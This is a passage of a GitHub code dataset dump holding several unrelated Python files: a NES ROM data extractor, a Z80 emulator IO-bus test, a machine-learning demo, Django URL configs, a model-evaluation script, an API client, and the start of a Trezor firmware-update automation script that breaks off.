row.append(enemy_group_pattern.enemy_group_size)\n row.append(enemy_group_pattern.enemy_group_0_size + enemy_group_pattern.enemy_group_1_size + enemy_group_pattern.enemy_group_2_size)\n if enemy_group_pattern.enemy_group_0_enemy_id is not None:\n enemy_0_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_0_enemy_id).enemy_name.strip()\n row.append(enemy_0_name)\n row.append(enemy_group_pattern.enemy_group_0_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_1_enemy_id is not None:\n enemy_1_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_1_enemy_id).enemy_name.strip()\n row.append(enemy_1_name)\n row.append(enemy_group_pattern.enemy_group_1_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n if enemy_group_pattern.enemy_group_2_enemy_id is not None:\n enemy_2_name = _get_enemy_name(prg_rom_bytes, enemy_group_pattern.enemy_group_2_enemy_id).enemy_name.strip()\n row.append(enemy_2_name)\n row.append(enemy_group_pattern.enemy_group_2_size)\n else:\n row.append(\"-\")\n row.append(\"-\")\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n else:\n # No group patterns in the list.\n row = [\n enemy_group_pattern_list_id,\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n \"-\",\n ]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _fill_world_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_prg_rom_address = {\n 0x00FCE7: \"ワールドマップ(森(木2本))\",\n 0x00FCE8: \"ワールドマップ(森(木1本))\",\n 0x00FCE9: \"ワールドマップ(??)\",\n 0x00FCEA: \"ワールドマップ(雪木(木1本))\",\n 0x00FCEB: \"ワールドマップ(山(茶色))\",\n 0x00FCEC: \"ワールドマップ(岩山(1マス;進入不可))\",\n 0x00FCED: \"ワールドマップ(雪山(1マス;進入不可))\",\n 0x00FCEE: \"ワールドマップ(平野(緑))\",\n 0x00FCEF: \"ワールドマップ(橋(上から下))\",\n 0x00FCF0: \"ワールドマップ(海(左側が橋の影;進入不可))\",\n 0x00FCF1: \"ワールドマップ(橋(左から右))\",\n 0x00FCF2: \"ワールドマップ(海(上側が橋の影;進入不可))\",\n 0x00FCF3: \"ワールドマップ(沼(緑))\",\n 0x00FCF4: \"ワールドマップ(水(岸なし;進入不可))\",\n 0x00FCF5: \"ワールドマップ(水(上側が岸;進入不可))\",\n 0x00FCF6: \"ワールドマップ(水(上側と左側が岸;進入不可))\",\n 0x00FCF7: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCF8: \"ワールドマップ(??)\",\n 0x00FCF9: \"ワールドマップ(水(下側が岸;進入不可))\",\n 0x00FCFA: \"ワールドマップ(水(左側と下側が岸;進入不可))\",\n 0x00FCFB: \"ワールドマップ(水(下側と右側が岸;進入不可))\",\n 0x00FCFC: \"ワールドマップ(??)\",\n 0x00FCFD: \"ワールドマップ(水(左側が岸;進入不可))\",\n 0x00FCFE: \"ワールドマップ(水(右側が岸;進入不可))\",\n 0x00FCFF: \"ワールドマップ(水(上側と下側が岸;進入不可))\",\n 0x00FD00: \"ワールドマップ(水(左側と右側が岸;進入不可))\",\n 0x00FD01: \"ワールドマップ(平野(緑;下側が岸))\",\n 0x00FD02: \"ワールドマップ(砂漠)\",\n 0x00FD03: \"ワールドマップ(??)\",\n 0x00FD04: \"ワールドマップ(ヤシの木)\",\n 0x00FD05: \"ワールドマップ(??)\",\n 0x00FD06: \"ワールドマップ(城壁(進入不可))\",\n 0x00FD07: \"ワールドマップ(スギ(2マスの上))\",\n 0x00FD08: \"ワールドマップ(雪原)\",\n 0x00FD09: \"ワールドマップ(スギ(2マスの下))\",\n 0x00FD0A: \"ワールドマップ(雪原(下側が岸))\",\n 0x00FD0B: \"ワールドマップ(岩山(2マスの左;進入不可))\",\n 0x00FD0C: \"ワールドマップ(岩山(2マスの右;進入不可))\",\n 0x00FD0D: \"ワールドマップ(町(2マス;左))\",\n 0x00FD0E: \"ワールドマップ(町(2マス;右))\",\n 0x00FD0F: \"ワールドマップ(洞窟(はしご))\",\n 0x00FD10: \"ワールドマップ(鳥居)\",\n 0x00FD11: \"ワールドマップ(町(1マス))\",\n 0x00FD12: \"ワールドマップ(氷結城(4マス;左上))\",\n 0x00FD13: \"ワールドマップ(氷結城(4マス;右上))\",\n 0x00FD14: \"ワールドマップ(氷結城(4マス;左下))\",\n 0x00FD15: \"ワールドマップ(氷結城(4マス;右下))\",\n 0x00FD16: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左上))\",\n 0x00FD17: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右上))\",\n 0x00FD18: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;左下))\",\n 0x00FD19: \"ワールドマップ(火山・ピラミッド・呪い城(4マス;右下))\",\n 0x00FD1A: \"ワールドマップ(町跡地)\",\n 0x00FD1B: \"オニガランド(森(木1本))\",\n 0x00FD1C: \"オニガランド(??)\",\n 0x00FD1D: \"オニガランド(平野(茶))\",\n 0x00FD1E: \"オニガランド(森(幹無し))\",\n 0x00FD1F: \"オニガランド(森(木2本))\",\n 0x00FD20: \"オニガランド(平野(緑))\",\n 0x00FD21: \"オニガランド(??)\",\n 0x00FD22: \"オニガランド(??)\",\n 0x00FD23: \"オニガランド(??)\",\n 0x00FD24: \"オニガランド(??)\",\n 0x00FD25: \"オニガランド(??)\",\n 0x00FD26: \"オニガランド(水(岸なし))\",\n 0x00FD27: \"オニガランド(水(上側が岸))\",\n 0x00FD28: \"オニガランド(水(上側と左側が岸))\",\n 0x00FD29: \"オニガランド(水(上側と右側が岸))\",\n 0x00FD2A: \"オニガランド(??)\",\n 0x00FD2B: \"オニガランド(水(下側が岸))\",\n 0x00FD2C: \"オニガランド(水(左側と下側が岸))\",\n 0x00FD2D: \"オニガランド(水(下側と右側が岸))\",\n 0x00FD2E: \"オニガランド(??)\",\n 0x00FD2F: \"オニガランド(水(左側が岸))\",\n 0x00FD30: \"オニガランド(水(右側が岸))\",\n 0x00FD31: \"オニガランド(水(上側と下側が岸))\",\n 0x00FD32: \"オニガランド(水(左側と右側が岸))\",\n 0x00FD33: \"オニガランド(平野(茶;下側が岸))\",\n 0x00FD34: \"オニガランド(トゲ)\",\n 0x00FD35: \"オニガランド(溶岩)\",\n 0x00FD36: \"オニガランド(??)\",\n 0x00FD37: \"オニガランド(??)\",\n 0x00FD38: \"オニガランド(??)\",\n 0x00FD39: \"オニガランド(??)\",\n 0x00FD3A: \"オニガランド(??)\",\n 0x00FD3B: \"オニガランド(??)\",\n 0x00FD3C: \"オニガランド(??)\",\n 0x00FD3D: \"オニガランド(??)\",\n 0x00FD3E: \"オニガランド(??)\",\n 0x00FD3F: \"オニガランド(??)\",\n 0x00FD40: \"オニガランド(??)\",\n 0x00FD41: \"オニガランド(??)\",\n 0x00FD42: \"オニガランド(??)\",\n 0x00FD43: \"オニガランド(??)\",\n 0x00FD44: \"オニガランド(??)\",\n 0x00FD45: \"オニガランド(??)\",\n 0x00FD46: \"オニガランド(??)\",\n 0x00FD47: \"オニガランド(??)\",\n 0x00FD48: \"オニガランド(??)\",\n 0x00FD49: \"オニガランド(??)\",\n 0x00FD4A: \"オニガランド(??)\",\n 0x00FD4B: \"オニガランド(??)\",\n 0x00FD4C: \"オニガランド(??)\",\n 0x00FD4D: \"オニガランド(??)\",\n 0x00FD4E: \"オーロラ王国(雪原)\",\n 0x00FD4F: \"オーロラ王国(雪原(下側が岸))\",\n 0x00FD50: \"オーロラ王国(??)\",\n 0x00FD51: \"オーロラ王国(??)\",\n 0x00FD52: \"オーロラ王国(??)\",\n 0x00FD53: \"オーロラ王国(??)\",\n 0x00FD54: \"オーロラ王国(土)\",\n 0x00FD55: \"オーロラ王国(??)\",\n 0x00FD56: \"オーロラ王国(??)\",\n 0x00FD57: \"オーロラ王国(??)\",\n 0x00FD58: \"オーロラ王国(??)\",\n 0x00FD59: \"オーロラ王国(??)\",\n 0x00FD5A: \"オーロラ王国(??)\",\n 0x00FD5B: \"オーロラ王国(??)\",\n 0x00FD5C: \"オーロラ王国(??)\",\n 0x00FD5D: \"オーロラ王国(??)\",\n 0x00FD5E: \"オーロラ王国(??)\",\n 0x00FD5F: \"オーロラ王国(??)\",\n 0x00FD60: \"オーロラ王国(??)\",\n 0x00FD61: \"オーロラ王国(??)\",\n 0x00FD62: \"オーロラ王国(??)\",\n 0x00FD63: \"オーロラ王国(??)\",\n 0x00FD64: \"オーロラ王国(土(下側が岸))\",\n 0x00FD65: \"オーロラ王国(??)\",\n 0x00FD66: \"オーロラ王国(??)\",\n 0x00FD67: \"オーロラ王国(階段)\",\n 0x00FD68: \"オーロラ王国(??)\",\n 0x00FD69: \"オーロラ王国(??)\",\n 0x00FD6A: \"オーロラ王国(??)\",\n 0x00FD6B: \"オーロラ王国(??)\",\n 0x00FD6C: \"オーロラ王国(??)\",\n 0x00FD6D: \"オーロラ王国(??)\",\n 0x00FD6E: \"オーロラ王国(??)\",\n 0x00FD6F: \"オーロラ王国(??)\",\n 0x00FD70: \"オーロラ王国(??)\",\n 0x00FD71: \"オーロラ王国(??)\",\n 0x00FD72: \"オーロラ王国(??)\",\n 0x00FD73: \"オーロラ王国(??)\",\n 0x00FD74: \"オーロラ王国(??)\",\n 0x00FD75: \"オーロラ王国(??)\",\n 0x00FD76: \"オーロラ王国(??)\",\n 0x00FD77: \"オーロラ王国(??)\",\n 0x00FD78: \"オーロラ王国(??)\",\n 0x00FD79: \"オーロラ王国(??)\",\n 0x00FD7A: \"オーロラ王国(??)\",\n 0x00FD7B: \"オーロラ王国(??)\",\n 0x00FD7C: \"オーロラ王国(??)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップ説明・マス説明\"),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for prg_rom_address in range(0x00FCE7, 0x00FD7C + 1):\n encounter_threshold_id = prg_rom_bytes[prg_rom_address]\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [description_by_prg_rom_address[prg_rom_address], encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef main() -> None:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"input_ines_file_path\", type=str)\n parser.add_argument(\"output_excel_file_path\", type=str)\n args = parser.parse_args()\n\n prg_rom_bytes = _read_prg_rom(args.input_ines_file_path)\n expected_prg_rom_crc = 0x29C61B41\n if binascii.crc32(prg_rom_bytes) != expected_prg_rom_crc:\n raise ValueError(\"Unexpected PRG ROM CRC\")\n\n workbook = openpyxl.Workbook()\n workbook.active.title = \"味方キャラステータス\"\n _fill_player_character(prg_rom_bytes, workbook.active)\n _fill_enemy(prg_rom_bytes, workbook.create_sheet(\"敵キャラステータス\"))\n _fill_map(prg_rom_bytes, workbook.create_sheet(\"マップ\"))\n _fill_world_map(prg_rom_bytes, workbook.create_sheet(\"ワールドマップ\"))\n _fill_enemy_group_pattern_list(prg_rom_bytes, workbook.create_sheet(\"敵グループパターンリスト\"))\n workbook.save(args.output_excel_file_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"applemon8080/jvq-analysis","sub_path":"jvqdump.py","file_name":"jvqdump.py","file_ext":"py","file_size_in_byte":73446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"72625409927","text":"import unittest\nfrom pyz80.iobus import *\nfrom unittest import mock\n\nclass TestIOBus(unittest.TestCase):\n def test_read(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n devices[n].read.side_effect = lambda a : a + n\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n self.assertEqual(a+n, UUT.read(n, a))\n devices[n].read.assert_called_once_with(a)\n for device in devices:\n if device != devices[n]:\n device.read.assert_not_called()\n\n def test_write(self):\n devices = [ mock.MagicMock(Device, name=\"device\" + str(n)) for n in range(0,4) ]\n def matches(n):\n def __inner(p):\n return p == n\n return __inner\n for n in range(0,4):\n devices[n].responds_to_port.side_effect = matches(n)\n\n UUT = IOBus(devices)\n\n for n in range(0,4):\n for a in range(0,256):\n for device in devices:\n device.reset_mock()\n UUT.write(n, a, mock.sentinel.data)\n devices[n].write.assert_called_once_with(a, mock.sentinel.data)\n for device in devices:\n if device != devices[n]:\n device.write.assert_not_called()\n\nclass TestDevice(unittest.TestCase):\n def test_responds_to_port(self):\n UUT = Device()\n for n in range(0,256):\n self.assertFalse(UUT.responds_to_port(n))\n\n def test_read(self):\n UUT = Device()\n for a in range(0,256):\n self.assertEqual(0x00, UUT.read(a))\n\n def test_write(self):\n UUT = Device()\n for a in range(0,256):\n UUT.write(a, mock.sentinel.data)\n","repo_name":"jamespbarrett/pyz80","sub_path":"tests/test_iobus.py","file_name":"test_iobus.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"18896582886","text":"\"\"\"Напишите программу, в которой вычисляется факториал числа.\nФакториалом n! числа n называется произведение всех чисел от единицы\nдо этого числа: n! = 1 Г 2 Г 3 Г … Г n. Число, для которого вычисляется\nфакториал, вводится пользователем с клавиатуры.\"\"\"\n\nn = input(\"Введите число: \")\n\nif not n.isdigit():\n print(\"Неверный ввод!\")\n exit()\n\nfactorial = 1\nfor i in range(1, int(n) + 1):\n factorial *= i\n\nprint(f\"{n}! = {factorial}\")\n","repo_name":"widgeton/PythonExercises","sub_path":"01.Acquaintance/01.07.py","file_name":"01.07.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"840902074","text":"#%%\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.datasets import make_blobs\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\n\n#%%\n# SUMMARY OF LOGISTIC REGRESSION MODEL:\n# ---------------------------------------------\n# 1. Create a model with LogisticRegression().\n# 2. Train the model with model.fit().\n# 3. Make predictions with model.predict().\n# 4. Validate the model with accuracy_score(). \n\n#%%\nX, y = make_blobs(centers=2, random_state=42)\n\nprint(f\"Labels: {y[:10]}\")\nprint(f\"Data: {X[:10]}\")\n# %%\nplt.scatter(X[:, 0], X[:, 1], c=y)\n\n# %%\n# Training and testing the model\nX_train, X_test, y_train, y_test = train_test_split(X,\n y, random_state=1, stratify=y)\n# %%\n# Instantiate a Logistic Regression Model\n\nclassifier = LogisticRegression(solver='lbfgs', random_state=1)\nclassifier\n\nLogisticRegression(C=1.0, class_weight=None, dual=False, fit_intercept=True,\n intercept_scaling=1, l1_ratio=None, max_iter=100,\n multi_class='warn', n_jobs=None, penalty='12',\n random_state=1, solver='lbfgs', tol=0.0001, verbose=0,\n warm_start=False)\n# %%\n# Train the Logistic Regression model\nclassifier.fit(X_train, y_train)\n\n#%%\n# Validate the logistic regression model\npredictions = classifier.predict(X_test)\npd.DataFrame({\"Prediction\": predictions, \"Actual\": y_test})\n# Evaluate the performance of the predictions\naccuracy_score(y_test, predictions)\n\n#%%\n# Classify if the next point is purple or yellow\nnew_data = np.array([[-2, 6]])\nplt.scatter(X[:, 0], X[:, 1], c=y)\nplt.scatter(new_data[0, 0], new_data[0, 1], c=\"r\", marker=\"o\", s=100)\nplt.show()\n# %%\npredictions = classifier.predict(new_data)\nprint(\"Classes are either 0 (purple) or 1 (yellow)\")\nprint(f\"The new point was classified as: {predictions}\")\n# %%\n","repo_name":"ines-tb/MachineLearning-analysis","sub_path":"logistic_regression/demo/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1512611402","text":"from django.conf.urls.defaults import patterns, url, include\nfrom django.contrib import admin\n\nfrom transmogrifier.settings import MEDIA_ROOT\nfrom messportal import urls\n\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n \n url(r'^media/(?P.*)$',\n 'django.views.static.serve',\n { 'document_root': MEDIA_ROOT }),\n\n url(r'^admin/',\n include(admin.site.urls)\n ),\n\n url(r'^',\n include('transmogrifier.messportal.urls')\n ),\n )\n","repo_name":"s-ramaswamy/transmogrifier","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"3094468591","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.red),#Redirect from startpage\n url(r'^admin/', admin.site.urls),#standart adminpanel\n url(r'^index/', include('index.urls')),#index app\n url(r'^metrics/', include('metrics.urls')),#metrics app\n url(r'^auth/', include('auth.urls')),#auth app\n url(r'^books/', include('books.urls')),#books app\n]\n","repo_name":"ptera-py/hlaf","sub_path":"hlaf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"17363648724","text":"import pickle\nfrom pathlib import Path\nfrom typing import List\n\nimport click\nfrom torch.utils.data import DataLoader\nfrom pytorch_lightning import Trainer\n\nfrom src.data_loading.load_augsburg15 import Augsburg15Dataset, collate_augsburg15_detection\nimport torch\n\nfrom src.models.soft_teacher import SoftTeacher\n\n\ndef _get_evaluation_data_loader(evaluation_dataset_name):\n root_directory, image_info_csv, dataset_type = Augsburg15Dataset.DATASET_MAPPING[evaluation_dataset_name]\n dataset = Augsburg15Dataset(\n root_directory=root_directory,\n image_info_csv=image_info_csv,\n transforms=[],\n dataset_type=dataset_type,\n )\n return DataLoader(\n dataset,\n batch_size=1,\n collate_fn=collate_augsburg15_detection,\n drop_last=True,\n num_workers=4\n )\n\n\ndef _make_validation_predictions(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1,\n train_dataset=None,\n validation_dataset=None,\n test_dataset=None,\n )\n model.eval()\n device = torch.device('cuda:0') if torch.cuda.is_available() else torch.device('cpu')\n model.to(device)\n\n results = []\n\n for index, sample in enumerate(data_loader):\n image, target = sample\n\n image = image.to(device)\n\n result = model(image)\n results.append(\n (result[0]['boxes'].detach().cpu(), result[0]['labels'].detach().cpu(), result[0]['scores'].detach().cpu()))\n\n with open(checkpoint_path.parent / f'predictions_{evaluation_dataset_name}.pkl', 'wb') as file:\n pickle.dump(results, file)\n\n\ndef _run_test_set(checkpoint_path, evaluation_dataset_name):\n data_loader = _get_evaluation_data_loader(evaluation_dataset_name)\n\n model = SoftTeacher.load_from_checkpoint(\n checkpoint_path,\n num_classes=Augsburg15Dataset.NUM_CLASSES,\n batch_size=1\n )\n\n trainer = Trainer(\n gpus=1 if torch.cuda.is_available() else 0,\n precision=16,\n )\n results = trainer.test(\n model,\n dataloaders=data_loader,\n ckpt_path=checkpoint_path\n )\n with open(checkpoint_path.parent / f'results_{evaluation_dataset_name}.pkl', 'w') as file:\n file.write(str(results))\n\n\ndef _run_evaluation_for_experiment(\n ckpt_path: Path,\n evaluation_datasets: List[str]\n):\n ckpt_path = Path(ckpt_path)\n for evaluation_dataset in evaluation_datasets:\n _make_validation_predictions(ckpt_path, evaluation_dataset)\n _run_test_set(ckpt_path, evaluation_dataset)\n\n\n@click.command()\n@click.option(\n '--checkpoint_path',\n required=True,\n multiple=True,\n help='Which checkpoints to use for evaluation.'\n)\n@click.option(\n '--evaluation_dataset_group',\n default='evaluate_2016augsburg15',\n help='Which datasets to use for evaluation.'\n)\ndef run_evaluation_for_experiments(\n checkpoint_path,\n evaluation_dataset_group: str\n):\n if evaluation_dataset_group == 'evaluate_2016augsburg15':\n evaluation_datasets = [\n 'validation_synthesized_2016_augsburg15',\n 'test_synthesized_2016_augsburg15',\n 'test_synthesized_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_raw':\n evaluation_datasets = [\n 'validation_raw_2016_2018_augsburg15',\n 'test_raw_2016_2018_augsburg15',\n 'test_raw_manual_set'\n ]\n elif evaluation_dataset_group == 'evaluate_2016+2018augsburg15_synthesised':\n evaluation_datasets = [\n 'validation_synthesized_2016_2018_augsburg15',\n 'test_synthesized_2016_2018_augsburg15',\n 'test_synthesized_manual_set'\n ]\n else:\n raise ValueError(f'No such evaluation_dataset_group: {evaluation_dataset_group}')\n\n for ckpt_path in checkpoint_path:\n _run_evaluation_for_experiment(ckpt_path, evaluation_datasets)\n\n\nif __name__ == '__main__':\n run_evaluation_for_experiments()\n","repo_name":"MilesGrey/ssl-pollen-detection","sub_path":"run_evaluation.py","file_name":"run_evaluation.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"44942357341","text":"import os\nimport json\nimport pickle as pkl\nfrom collections import defaultdict, Counter\n\nimport numpy as np\nfrom tqdm import tqdm\n\nimport read_ap\nimport download_ap\n\nfrom gensim_corpus import GensimCorpus, BOWCorpus, TFIDFCorpus, ModelCorpus\nfrom gensim.models import LdaModel\nfrom gensim.matutils import kullback_leibler, sparse2full\n\nfrom trec import TrecAPI\n\nimport argparse\n\nclass LatentDirichletAllocation():\n \"\"\"\n This class implements latent dirichlet allocation using the gensim library.\n \"\"\"\n def __init__(self, corpus, num_topics=500, iterations=2000, passes=20, eval_every=None, embedding=\"bow\"):\n\n self.lda_model_path = \"./saved_models/gensim-lda-model-nt-{}.mm\".format(num_topics)\n self.lda_corpus_path = \"./saved_models/gensim-lda-nt-{}-corpus.crp\".format(num_topics)\n\n self.index_path = \"./saved_models/gensim-lda-model.pkl\"\n self.lda_corpus_path = \"./saved_models/gensim-lda-corpus.crp\"\n\n self.corpus = corpus\n self.num_topics = num_topics\n self.lda_corpus = []\n\n if os.path.exists(self.lda_model_path):\n print(\"LDA model already trained, loading from disk.\")\n self.model = LdaModel.load(self.lda_model_path)\n\n else:\n\n # Make a index to word dictionary.\n temp = corpus.dictionary[0] # This is only to \"load\" the dictionary.\n id2word = corpus.dictionary.id2token\n\n print(\"Training LDA model.\")\n self.model = LdaModel(\n corpus=list(corpus.get_corpus()),\n id2word=id2word,\n iterations=iterations,\n num_topics=num_topics,\n eval_every=eval_every\n )\n\n self.model.save(self.lda_model_path)\n\n self.lda_corpus = ModelCorpus(corpus.get_corpus(), self.model, path=self.lda_corpus_path, persist=True)\n\n self.lda_corpus_pers = [sparse2full(doc, self.num_topics) for doc in self.lda_corpus]\n\n def search(self, query):\n\n query_repr = read_ap.process_text(query)\n vec_query = self.corpus.dictionary.doc2bow(query_repr)\n lda_query = sparse2full(self.model[vec_query], self.num_topics)\n\n results = defaultdict(float)\n for doc_id, lda_doc_repr in zip(self.corpus.doc_ids, self.lda_corpus_pers):\n results[doc_id] = kullback_leibler(lda_query, lda_doc_repr)\n\n results = {k: v for k, v in sorted(results.items(), key=lambda item: item[1], reverse=True)}\n return list(results.items())\n\nif __name__ == \"__main__\":\n\n os.makedirs(\"results\", exist_ok=True)\n os.makedirs(\"saved_models/sim_temps\", exist_ok=True)\n os.makedirs(\"raw_output\", exist_ok=True)\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-embedding\", type=str, default=\"tfidf\", help=\"Embedding to use in training LDA.\")\n parser.add_argument(\"-num_topics\", type=int, default=500, help=\"Number of topics to use in training LDA.\")\n args = parser.parse_args()\n\n num_topics = args.num_topics\n # ensure dataset is downloaded\n download_ap.download_dataset()\n # pre-process the text\n docs_by_id = None\n docs_by_id = read_ap.get_processed_docs()\n\n gensim_corpus = GensimCorpus(docs_by_id, args.embedding)\n\n lda = LatentDirichletAllocation(gensim_corpus, eval_every=None, num_topics=num_topics, embedding=args.embedding)\n\n # read in the qrels\n qrels, queries = read_ap.read_qrels()\n\n overall_ser = {}\n\n print(\"Running LDA benchmark\")\n\n # Write results to trec-style file\n if not os.path.exists(\"lda_results.out\"):\n\n # collect results\n for qid in tqdm(qrels):\n query_text = queries[qid]\n\n results = lda.search(query_text)\n overall_ser[qid] = dict(results)\n\n results_lines = []\n for qid in overall_ser:\n for doc_id in overall_ser[qid]:\n results_lines.append(str(qid) + '\\tQO\\t' + doc_id + '\\t0\\t' + str(overall_ser[qid][doc_id]) + '\\tSTANDARD\\n')\n with open('./raw_output/lda_results.out', 'w') as f:\n f.writelines(results_lines)\n\n trec = TrecAPI('D:/Google Drive/Documenten/UVA/MSc AI/Information Retrieval 1/trec_eval-master/trec_eval.exe')\n metrics = trec.evaluate(test_file_name='datasets/ap/qrels.tsv', prediction_file_name='./raw_output/lda_results.out', metrics_to_capture={'map', 'ndcg'})\n\n # dump this to JSON\n # *Not* Optional - This is submitted in the assignment!\n with open(\"./results/lda-{}-topics.json\".format(num_topics), \"w\") as writer:\n json.dump(metrics, writer, indent=1)","repo_name":"davidvos/master-projects","sub_path":"information-retrieval/lda.py","file_name":"lda.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"31211244358","text":"import logging\n\nfrom csm_api_client.service.gateway import APIError, APIGatewayClient\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass JobstatClient(APIGatewayClient):\n base_resource_path = 'statechecker/jobstat/'\n\n def get_all(self):\n \"\"\"Get all results from Job State Checker.\n\n Returns:\n A list of dictionaries where each dictionary pertains to a\n single job.\n\n Raises:\n APIError: if there is a failure querying the Job State Checker API\n or getting the required information from the response.\n \"\"\"\n err_prefix = 'Failed to get State Checker data'\n try:\n response = self.get('all').json()\n return response['jobstat']\n except APIError as err:\n raise APIError(f'{err_prefix}: {err}')\n except ValueError as err:\n raise APIError(f'{err_prefix} due to bad JSON in response: {err}')\n except KeyError as err:\n raise APIError(f'{err_prefix} due to missing {err} key in response.')\n","repo_name":"Cray-HPE/sat","sub_path":"sat/apiclient/jobstat.py","file_name":"jobstat.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"25315972081","text":"from django.shortcuts import render\nfrom models import Bride, Groom, Party,Venue\n\n# Create your views here.\n\ndef get_index(request):\n brides=Bride.objects.filter()\n bride=brides[0]\n grooms=Groom.objects.filter()\n groom=grooms[0]\n party=Party.objects.filter()\n venues=Venue.objects.filter()\n\n return render(request, 'homepage.html',{'bride':bride,'groom':groom,'party':party,'venues':venues})","repo_name":"Cvd2014/LeahWedding","sub_path":"homepage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42423516753","text":"#!/usr/bin/env -S python3 -u\n# This is just a dirty playground, do not use.\n# It will be refactored over time.\n\nimport os\nimport sys\nimport serial\nimport time\nimport yaml\nimport datetime\n\nwith open(\"config.yml\", 'r') as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n\nuhub_loction = cfg['usb_location'];\nuhub_port = cfg['usb_port'];\narduino_serial = cfg['arduino_serial'];\n\ndef trezor_poweroff():\n now();\n print(\"[hardware/usb] Turning power off...\");\n os.system((\"uhubctl -l {} -p {} -r 100 -a off > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef trezor_poweron():\n now();\n print(\"[hardware/usb] Turning power on...\");\n os.system((\"uhubctl -l {} -p {} -a on > /dev/null\").format(uhub_loction, uhub_port));\n wait(3)\n\ndef touch(ser, location, action):\n now();\n print(\"[hardware/trezor] Touching the {} button by {}...\".format(location, action));\n ser.write((\"{} {}\\n\".format(location, action)).encode())\n\ndef wait(seconds):\n now();\n print(\"[software] Waiting for {} seconds...\".format(seconds));\n time.sleep(seconds);\n\ndef now():\n print(\"\\n[timestamp] {}\".format(datetime.datetime.now()));\n\ndef update_firmware(ser, version):\n if \"http\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -u {} &\".format(version);\n elif \"bin\" in version:\n unofficial = True;\n trezorctlcmd = \"trezorctl firmware-update -s -f {} &\".format(version);\n else:\n unofficial = False;\n trezorctlcmd = \"trezorctl firmware-update -v {} &\".format(version);\n trezor_poweroff();\n if \"1.8\" in version:\n touch(ser, \"left\", \"press\");\n else:\n touch(ser, \"all\", \"press\");\n wait(2);\n trezor_poweron();\n wait(2);\n touch(ser, \"all\", \"unpress\");\n print(\"[software/trezorctl] Updating the firmware to {}...\".format(version));\n os.system(trezorctlcmd);\n wait(3);\n touch(ser, \"right\", \"click\");\n wait(20);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(10);\n trezor_poweroff();\n trezor_poweron();\n if unofficial: touch(ser, \"right\", \"click\");\n if unofficial: wait(5);\n if unofficial: touch(ser, \"right\", \"click\");\n wait(5);\n os.system(\"trezorctl get-features|grep version\");\n\ndef 